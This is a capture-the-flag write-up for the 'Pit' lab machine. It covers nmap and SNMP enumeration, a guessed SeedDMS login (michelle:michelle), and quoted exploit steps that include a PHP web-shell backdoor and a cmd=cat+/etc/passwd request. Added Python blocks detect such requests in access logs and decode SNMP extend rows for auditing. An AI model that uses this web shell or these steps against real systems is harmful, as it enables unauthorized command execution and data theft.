Pit
Enum
NMAP
# Nmap 7.80 scan initiated Mon May 17 03:43:06 2021 as: nmap -sCV -p- -oN nmap 10.10.10.241
Nmap scan report for 10.10.10.241
Host is up (0.041s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
| 256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_ 256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open ssl/zeus-admin?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad request
| Content-Type: text/html; charset=utf8
| Transfer-Encoding: chunked
| X-DNS-Prefetch-Control: off
| Referrer-Policy: no-referrer
| X-Content-Type-Options: nosniff
| Cross-Origin-Resource-Policy: same-origin
| <!DOCTYPE html>
| <html>
| <head>
| <title>
| request
| </title>
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <style>
| body {
| margin: 0;
| font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
| font-size: 12px;
| line-height: 1.66666667;
| color: #333333;
| background-color: #f5f5f5;
| border: 0;
| vertical-align: middle;
| font-weight: 300;
|_ margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after: 2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 17 03:49:12 2021 -- 1 IP address (1 host up) scanned in 366.86 seconds
UDP
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-18 03:16 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.041s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
161/udp open snmp
Nmap done: 1 IP address (1 host up) scanned in 1094.54 seconds
Port 80
Visiting the page shows the nginx RHEL start page.
From the SNMP enumeration we got information about another directory path.
We can visit http://dms-pit.htb/seeddms51x/seeddms/
Googling for default credentials shows admin:admin. These do not work, however. If we try michelle:michelle we are granted access.
There is a post which mentions that the version has been upgraded to 5.1.15, for which there is an RCE vulnerability.
┌──(bob㉿kali)-[~/htb/pit/snmp]
└─$ searchsploit seeddms
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
SeedDMS 5.1.18 - Persistent Cross-Site Scripting | php/webapps/48324.txt
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting | php/webapps/47024.txt
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting | php/webapps/47023.txt
SeedDMS versions < 5.1.11 - Remote Command Execution | php/webapps/47022.txt
------------------------------
From the exploit
Exploit Steps:
Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
PHP Backdoor Code:
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
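Step 4 leaves a distinctive trace in the web server's access log: a request for a script file under the data folder. The following is an added example, not part of the original writeup or the exploit text, that flags such requests. It assumes nginx's combined log format; the function name, log lines, client addresses and document ids are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed nginx "combined" access-log lines; addresses and document ids are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [17/May/2021:04:01:11 +0000] "GET /seeddms51x/seeddms/out/out.GroupMgr.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [17/May/2021:04:03:02 +0000] "GET /seeddms51x/data/1048576/29/1.php?cmd=cat+/etc/passwd HTTP/1.1" 200 954 "-" "curl/7.74.0"
192.0.2.44 - - [17/May/2021:04:05:19 +0000] "GET /seeddms51x/data/1048576/30/1%2Ephp HTTP/1.1" 404 146 "-" "curl/7.74.0"
192.0.2.77 - - [17/May/2021:04:06:00 +0000] "GET /seeddms51x/data/1048576/12/1.pdf HTTP/1.1" 403 146 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions commonly mapped to the PHP handler (assumption; match the server's config).
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5", ".php7")


def data_dir_script_hits(log_text, data_folder="1048576"):
    """Return requests for script files stored under data/<data_folder>/<document_id>/."""
    path_re = re.compile(
        r"/data/" + re.escape(data_folder)
        + r"/(?P<doc>\d+)/(?P<file>[^/]+)(?:/.*)?$"
    )
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        # Decode %xx escapes and fold case so "1%2Ephp" and "1.PHP" are not missed.
        path = unquote(parts.path).lower()
        pm = path_re.search(path)
        if not pm or not pm["file"].endswith(SCRIPT_EXTS):
            continue
        hits.append({
            "client": m["ip"],
            "time": m["ts"],
            "doc_id": pm["doc"],
            "file": pm["file"],
            "query": parts.query,
            # 200 means the file was served (and executed, if PHP handles it).
            "served": m["status"] == "200",
        })
    return hits


if __name__ == "__main__":
    for h in data_dir_script_hits(SAMPLE_LOG):
        state = "SERVED" if h["served"] else "not served"
        print(f'{h["time"]} {h["client"]} doc {h["doc_id"]} '
              f'{h["file"]} ?{h["query"]} [{state}]')
```

A served hit means an uploaded file was reachable and handled as a script under the web root; keeping the data folder outside the document root removes that path.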
Port 161
To convert the MIB output generated when poking at SNMP into a human-readable form, we need to install an additional package:
sudo apt install snmp-mibs-downloader
Then comment out the "mibs :" line in /etc/snmp/snmp.conf:
# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
#mibs :
[...]
snmpwalk -c public -v2c 10.10.10.241 .1
SNMPv2-MIB::sysDescr.0 = STRING: Linux pit.htb 4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (8368749) 23:14:47.49
SNMPv2-MIB::sysContact.0 = STRING: Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
SNMPv2-MIB::sysName.0 = STRING: pit.htb
SNMPv2-MIB::sysLocation.0 = STRING: Unknown (edit /etc/snmp/snmpd.conf)
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
SNMPv2-MIB::sysORID.7 = OID: IP-MIB::ip
SNMPv2-MIB::sysORID.8 = OID: UDP-MIB::udpMIB
SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing IP and ICMP implementations
SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing UDP implementations
SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.
SNMPv2-MIB::sysORUpTime.1 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.2 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.3 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.4 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.5 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.6 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.7 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.8 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.9 = Timeticks: (1) 0:00:00.01
SNMPv2-MIB::sysORUpTime.10 = Timeticks: (1) 0:00:00.01
HOST-RESOURCES-MIB::hrSystemUptime.0 = Timeticks: (8371797) 23:15:17.97
HOST-RESOURCES-MIB::hrSWRunIndex.1 = INTEGER: 1
HOST-RESOURCES-MIB::hrSWRunIndex.2 = INTEGER: 2
HOST-RESOURCES-MIB::hrSWRunIndex.3 = INTEGER: 3
HOST-RESOURCES-MIB::hrSWRunIndex.4 = INTEGER: 4
HOST-RESOURCES-MIB::hrSWRunIndex.6 = INTEGER: 6
HOST-RESOURCES-MIB::hrSWRunIndex.9 = INTEGER: 9
HOST-RESOURCES-MIB::hrSWRunIndex.10 = INTEGER: 10
HOST-RESOURCES-MIB::hrSWRunIndex.11 = INTEGER: 11
HOST-RESOURCES-MIB::hrSWRunIndex.12 = INTEGER: 12
HOST-RESOURCES-MIB::hrSWRunIndex.13 = INTEGER: 13
HOST-RESOURCES-MIB::hrSWRunIndex.14 = INTEGER: 14
HOST-RESOURCES-MIB::hrSWRunIndex.15 = INTEGER: 15
<SNIP>
UCD-SNMP-MIB::dskPath.1 = STRING: /
UCD-SNMP-MIB::dskPath.2 = STRING: /var/www/html/seeddms51x/seeddms
UCD-SNMP-MIB::dskDevice.1 = STRING: /dev/mapper/cl-root
UCD-SNMP-MIB::dskDevice.2 = STRING: /dev/mapper/cl-seeddms
UCD-SNMP-MIB::dskMinimum.1 = INTEGER: 10000
UCD-SNMP-MIB::dskMinimum.2 = INTEGER: 100000
UCD-SNMP-MIB::dskMinPercent.1 = INTEGER: -1
UCD-SNMP-MIB::dskMinPercent.2 = INTEGER: -1
UCD-SNMP-MIB::dskTotal.1 = INTEGER: 2611200
UCD-SNMP-MIB::dskTotal.2 = INTEGER: 125600
UCD-SNMP-MIB::dskAvail.1 = INTEGER: 347356
UCD-SNMP-MIB::dskAvail.2 = INTEGER: 75496
UCD-SNMP-MIB::dskUsed.1 = INTEGER: 2263844
UCD-SNMP-MIB::dskUsed.2 = INTEGER: 50104
UCD-SNMP-MIB::dskPercent.1 = INTEGER: 87
UCD-SNMP-MIB::dskPercent.2 = INTEGER: 40
UCD-SNMP-MIB::dskPercentNode.1 = INTEGER: 7
UCD-SNMP-MIB::dskPercentNode.2 = INTEGER: 4
UCD-SNMP-MIB::dskTotalLow.1 = Gauge32: 2611200
UCD-SNMP-MIB::dskTotalLow.2 = Gauge32: 125600
UCD-SNMP-MIB::dskTotalHigh.1 = Gauge32: 0
UCD-SNMP-MIB::dskTotalHigh.2 = Gauge32: 0
UCD-SNMP-MIB::dskAvailLow.1 = Gauge32: 347356
UCD-SNMP-MIB::dskAvailLow.2 = Gauge32: 75496
UCD-SNMP-MIB::dskAvailHigh.1 = Gauge32: 0
UCD-SNMP-MIB::dskAvailHigh.2 = Gauge32: 0
UCD-SNMP-MIB::dskUsedLow.1 = Gauge32: 2263844
UCD-SNMP-MIB::dskUsedLow.2 = Gauge32: 50104
UCD-SNMP-MIB::dskUsedHigh.1 = Gauge32: 0
UCD-SNMP-MIB::dskUsedHigh.2 = Gauge32: 0
UCD-SNMP-MIB::dskErrorFlag.1 = INTEGER: noError(0)
UCD-SNMP-MIB::dskErrorFlag.2 = INTEGER: error(1)
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."monitoring" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."monitoring" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."monitoring" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."monitoring" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."monitoring" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."monitoring" = STRING: Memory usage
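Without the MIB files, the nsExtend rows above appear as raw OIDs in which the entry name ("monitoring") is encoded as a length-prefixed run of ASCII codes. The following is an added example, not part of the original writeup, that decodes those rows and summarises what the agent hands to anyone holding the read community. The sample rows are abridged from this host's numeric walk shown further down; the function names are hypothetical.

```python
import re

EXTEND_BASE = (1, 3, 6, 1, 4, 1, 8072, 1, 3, 2)  # NET-SNMP-EXTEND-MIB::nsExtendObjects

# (table, column) under nsExtendObjects.<table>.1.<column> -> column name
COLUMNS = {
    (2, 2): "nsExtendCommand", (2, 3): "nsExtendArgs", (2, 4): "nsExtendInput",
    (2, 5): "nsExtendCacheTime", (2, 6): "nsExtendExecType",
    (2, 7): "nsExtendRunType", (2, 20): "nsExtendStorage", (2, 21): "nsExtendStatus",
    (3, 1): "nsExtendOutput1Line", (3, 2): "nsExtendOutputFull",
    (3, 3): "nsExtendOutNumLines", (3, 4): "nsExtendResult",
    (4, 2): "nsExtendOutLine",
}
ROW_RE = re.compile(
    r"^\.?(?P<oid>\d+(?:\.\d+)+) = (?:(?P<type>[A-Za-z0-9-]+): ?)?(?P<value>.*)$"
)

# Rows abridged from the numeric walk of this host.
SAMPLE_WALK = """\
.1.3.6.1.2.1.1.5.0 = STRING: pit.htb
.1.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: /usr/bin/monitor
.1.3.6.1.4.1.8072.1.3.2.2.1.3.10.109.111.110.105.116.111.114.105.110.103 = STRING:
.1.3.6.1.4.1.8072.1.3.2.2.1.5.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 5
.1.3.6.1.4.1.8072.1.3.2.2.1.7.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: run-on-read(1)
.1.3.6.1.4.1.8072.1.3.2.3.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: Memory usage
Database status
OK - Connection to database successful.
.1.3.6.1.4.1.8072.1.3.2.3.1.3.10.109.111.110.105.116.111.114.105.110.103 = INTEGER: 31
.1.3.6.1.4.1.8072.1.3.2.4.1.2.10.109.111.110.105.116.111.114.105.110.103.8 = STRING: CentOS Linux release 8.3.2011
"""


def decode_extend_oid(oid):
    """Return (column, entry_name, line_no) for an nsExtend row, else None."""
    arcs = tuple(int(a) for a in oid.strip(".").split("."))
    n = len(EXTEND_BASE)
    if arcs[:n] != EXTEND_BASE or len(arcs) < n + 4:
        return None
    table, entry, column, length = arcs[n:n + 4]
    name = COLUMNS.get((table, column))
    chars = arcs[n + 4:n + 4 + length]
    rest = arcs[n + 4 + length:]
    if entry != 1 or name is None or len(chars) != length:
        return None
    if any(c > 255 for c in chars):
        return None
    token = bytes(chars).decode("utf-8", "replace")
    if table == 4:  # per-line output rows carry one extra arc: the line number
        return (name, token, rest[0]) if len(rest) == 1 else None
    return (name, token, None) if not rest else None


def audit_extend(walk_text):
    """Group nsExtend rows by entry name; non-OID lines continue the previous value."""
    entries, last = {}, None
    for line in walk_text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            if last is not None and line.strip():
                last[0][last[1]] += "\n" + line
            continue
        last = None
        decoded = decode_extend_oid(m["oid"])
        if decoded is None:
            continue
        column, token, line_no = decoded
        entry = entries.setdefault(token, {"output_lines": {}})
        if line_no is not None:
            entry["output_lines"][line_no] = m["value"]
        else:
            entry[column] = m["value"]
            last = (entry, column)
    return entries


def findings(entries):
    """One line per exposure a holder of the read community can observe."""
    out = []
    for token, e in sorted(entries.items()):
        cmd = e.get("nsExtendCommand", "?")
        out.append(f"{token}: agent runs {cmd} and returns its output over SNMP")
        if e.get("nsExtendRunType", "").startswith("run-on-read"):
            out.append(f"{token}: command is executed when the row is read")
    return out


if __name__ == "__main__":
    for item in findings(audit_extend(SAMPLE_WALK)):
        print(item)
```

Restricting the read community to a view that excludes the nsExtendObjects subtree keeps script output such as the SELinux login mapping out of anonymous walks.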
Trying https://github.com/dheiland-r7/snmp
./snmpbw.pl 10.10.10.241 public 2 4
.1.3.6.1.2.1.1.1.0 = STRING: Linux pit.htb 4.18.0-240.22.1.el8_3.x86_64 #1 SMP Thu Apr 8 19:01:30 UTC 2021 x86_64
.1.3.6.1.2.1.1.2.0 = OID: .1.3.6.1.4.1.8072.3.2.10
.1.3.6.1.2.1.1.3.0 = Timeticks: (16564064) 1 day, 22:00:40.64
.1.3.6.1.2.1.1.4.0 = STRING: Root <root@localhost> (configure /etc/snmp/snmp.local.conf)
.1.3.6.1.2.1.1.5.0 = STRING: pit.htb
.1.3.6.1.2.1.1.6.0 = STRING: Unknown (edit /etc/snmp/snmpd.conf)
.1.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.2.1 = OID: .1.3.6.1.6.3.10.3.1.1
.1.3.6.1.2.1.1.9.1.2.2 = OID: .1.3.6.1.6.3.11.3.1.1
.1.3.6.1.2.1.1.9.1.2.3 = OID: .1.3.6.1.6.3.15.2.1.1
.1.3.6.1.2.1.1.9.1.2.4 = OID: .1.3.6.1.6.3.1
.1.3.6.1.2.1.1.9.1.2.5 = OID: .1.3.6.1.6.3.16.2.2.1
.1.3.6.1.2.1.1.9.1.2.6 = OID: .1.3.6.1.2.1.49
.1.3.6.1.2.1.1.9.1.2.7 = OID: .1.3.6.1.2.1.4
.1.3.6.1.2.1.1.9.1.2.8 = OID: .1.3.6.1.2.1.50
.1.3.6.1.2.1.1.9.1.2.9 = OID: .1.3.6.1.6.3.13.3.1.3
.1.3.6.1.2.1.1.9.1.2.10 = OID: .1.3.6.1.2.1.92
.1.3.6.1.2.1.1.9.1.3.1 = STRING: The SNMP Management Architecture MIB.
.1.3.6.1.2.1.1.9.1.3.2 = STRING: The MIB for Message Processing and Dispatching.
.1.3.6.1.2.1.1.9.1.3.3 = STRING: The management information definitions for the SNMP User-based Security Model.
.1.3.6.1.2.1.1.9.1.3.4 = STRING: The MIB module for SNMPv2 entities
.1.3.6.1.2.1.1.9.1.3.5 = STRING: View-based Access Control Model for SNMP.
.1.3.6.1.2.1.1.9.1.3.6 = STRING: The MIB module for managing TCP implementations
.1.3.6.1.2.1.1.9.1.3.7 = STRING: The MIB module for managing IP and ICMP implementations
.1.3.6.1.2.1.1.9.1.3.8 = STRING: The MIB module for managing UDP implementations
.1.3.6.1.2.1.1.9.1.3.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
.1.3.6.1.2.1.1.9.1.3.10 = STRING: The MIB module for logging SNMP Notifications.
.1.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
.1.3.6.1.2.1.25.1.1.0 = Timeticks: (16566976) 1 day, 22:01:09.76
.1.3.6.1.2.1.25.4.2.1.1.1 = INTEGER: 1
.1.3.6.1.2.1.25.4.2.1.1.2 = INTEGER: 2
[...]
.1.3.6.1.2.1.25.4.2.1.1.25361 = INTEGER: 25361
.1.3.6.1.2.1.25.4.2.1.2.1 = STRING: "systemd"
.1.3.6.1.2.1.25.4.2.1.2.2 = STRING: "kthreadd"
.1.3.6.1.2.1.25.4.2.1.2.3 = STRING: "rcu_gp"
.1.3.6.1.2.1.25.4.2.1.2.4 = STRING: "rcu_par_gp"
.1.3.6.1.2.1.25.4.2.1.2.6 = STRING: "kworker/0:0H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.9 = STRING: "mm_percpu_wq"
.1.3.6.1.2.1.25.4.2.1.2.10 = STRING: "ksoftirqd/0"
.1.3.6.1.2.1.25.4.2.1.2.11 = STRING: "rcu_sched"
.1.3.6.1.2.1.25.4.2.1.2.12 = STRING: "migration/0"
.1.3.6.1.2.1.25.4.2.1.2.13 = STRING: "watchdog/0"
.1.3.6.1.2.1.25.4.2.1.2.14 = STRING: "cpuhp/0"
.1.3.6.1.2.1.25.4.2.1.2.15 = STRING: "cpuhp/1"
.1.3.6.1.2.1.25.4.2.1.2.16 = STRING: "watchdog/1"
.1.3.6.1.2.1.25.4.2.1.2.17 = STRING: "migration/1"
.1.3.6.1.2.1.25.4.2.1.2.18 = STRING: "ksoftirqd/1"
.1.3.6.1.2.1.25.4.2.1.2.20 = STRING: "kworker/1:0H-kblockd"
.1.3.6.1.2.1.25.4.2.1.2.23 = STRING: "kdevtmpfs"
.1.3.6.1.2.1.25.4.2.1.2.24 = STRING: "netns"
.1.3.6.1.2.1.25.4.2.1.2.25 = STRING: "kauditd"
.1.3.6.1.2.1.25.4.2.1.2.26 = STRING: "khungtaskd"
.1.3.6.1.2.1.25.4.2.1.2.27 = STRING: "oom_reaper"
.1.3.6.1.2.1.25.4.2.1.2.28 = STRING: "writeback"
.1.3.6.1.2.1.25.4.2.1.2.29 = STRING: "kcompactd0"
.1.3.6.1.2.1.25.4.2.1.2.30 = STRING: "ksmd"
.1.3.6.1.2.1.25.4.2.1.2.31 = STRING: "khugepaged"
.1.3.6.1.2.1.25.4.2.1.2.32 = STRING: "crypto"
.1.3.6.1.2.1.25.4.2.1.2.33 = STRING: "kintegrityd"
.1.3.6.1.2.1.25.4.2.1.2.34 = STRING: "kblockd"
.1.3.6.1.2.1.25.4.2.1.2.35 = STRING: "blkcg_punt_bio"
.1.3.6.1.2.1.25.4.2.1.2.36 = STRING: "tpm_dev_wq"
.1.3.6.1.2.1.25.4.2.1.2.37 = STRING: "md"
.1.3.6.1.2.1.25.4.2.1.2.38 = STRING: "edac-poller"
.1.3.6.1.2.1.25.4.2.1.2.39 = STRING: "watchdogd"
.1.3.6.1.2.1.25.4.2.1.2.40 = STRING: "pm_wq"
.1.3.6.1.2.1.25.4.2.1.2.68 = STRING: "kswapd0"
.1.3.6.1.2.1.25.4.2.1.2.161 = STRING: "kthrotld"
.1.3.6.1.2.1.25.4.2.1.2.162 = STRING: "irq/24-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.163 = STRING: "irq/25-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.164 = STRING: "irq/26-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.165 = STRING: "irq/27-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.166 = STRING: "irq/28-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.167 = STRING: "irq/29-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.168 = STRING: "irq/30-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.169 = STRING: "irq/31-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.170 = STRING: "irq/32-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.171 = STRING: "irq/33-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.172 = STRING: "irq/34-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.173 = STRING: "irq/35-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.174 = STRING: "irq/36-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.175 = STRING: "irq/37-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.176 = STRING: "irq/38-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.177 = STRING: "irq/39-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.178 = STRING: "irq/40-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.179 = STRING: "irq/41-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.180 = STRING: "irq/42-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.181 = STRING: "irq/43-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.182 = STRING: "irq/44-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.183 = STRING: "irq/45-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.184 = STRING: "irq/46-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.185 = STRING: "irq/47-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.186 = STRING: "irq/48-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.187 = STRING: "irq/49-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.188 = STRING: "irq/50-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.189 = STRING: "irq/51-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.190 = STRING: "irq/52-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.191 = STRING: "irq/53-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.192 = STRING: "irq/54-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.193 = STRING: "irq/55-pciehp"
.1.3.6.1.2.1.25.4.2.1.2.194 = STRING: "acpi_thermal_pm"
.1.3.6.1.2.1.25.4.2.1.2.195 = STRING: "kmpath_rdacd"
.1.3.6.1.2.1.25.4.2.1.2.196 = STRING: "kaluad"
.1.3.6.1.2.1.25.4.2.1.2.198 = STRING: "ipv6_addrconf"
.1.3.6.1.2.1.25.4.2.1.2.199 = STRING: "kstrp"
.1.3.6.1.2.1.25.4.2.1.2.518 = STRING: "mpt_poll_0"
.1.3.6.1.2.1.25.4.2.1.2.519 = STRING: "mpt/0"
.1.3.6.1.2.1.25.4.2.1.2.520 = STRING: "ata_sff"
.1.3.6.1.2.1.25.4.2.1.2.527 = STRING: "scsi_eh_0"
.1.3.6.1.2.1.25.4.2.1.2.528 = STRING: "scsi_tmf_0"
.1.3.6.1.2.1.25.4.2.1.2.529 = STRING: "scsi_eh_1"
.1.3.6.1.2.1.25.4.2.1.2.530 = STRING: "scsi_tmf_1"
.1.3.6.1.2.1.25.4.2.1.2.531 = STRING: "scsi_eh_2"
.1.3.6.1.2.1.25.4.2.1.2.532 = STRING: "scsi_eh_3"
.1.3.6.1.2.1.25.4.2.1.2.533 = STRING: "scsi_tmf_2"
.1.3.6.1.2.1.25.4.2.1.2.534 = STRING: "scsi_tmf_3"
.1.3.6.1.2.1.25.4.2.1.2.535 = STRING: "scsi_eh_4"
.1.3.6.1.2.1.25.4.2.1.2.536 = STRING: "scsi_tmf_4"
.1.3.6.1.2.1.25.4.2.1.2.537 = STRING: "scsi_eh_5"
.1.3.6.1.2.1.25.4.2.1.2.538 = STRING: "scsi_tmf_5"
.1.3.6.1.2.1.25.4.2.1.2.539 = STRING: "scsi_eh_6"
.1.3.6.1.2.1.25.4.2.1.2.540 = STRING: "scsi_tmf_6"
.1.3.6.1.2.1.25.4.2.1.2.541 = STRING: "scsi_eh_7"
.1.3.6.1.2.1.25.4.2.1.2.542 = STRING: "scsi_tmf_7"
.1.3.6.1.2.1.25.4.2.1.2.543 = STRING: "scsi_eh_8"
.1.3.6.1.2.1.25.4.2.1.2.544 = STRING: "scsi_tmf_8"
.1.3.6.1.2.1.25.4.2.1.2.545 = STRING: "scsi_eh_9"
.1.3.6.1.2.1.25.4.2.1.2.546 = STRING: "scsi_tmf_9"
.1.3.6.1.2.1.25.4.2.1.2.547 = STRING: "scsi_eh_10"
.1.3.6.1.2.1.25.4.2.1.2.548 = STRING: "scsi_tmf_10"
.1.3.6.1.2.1.25.4.2.1.2.549 = STRING: "scsi_eh_11"
.1.3.6.1.2.1.25.4.2.1.2.550 = STRING: "scsi_tmf_11"
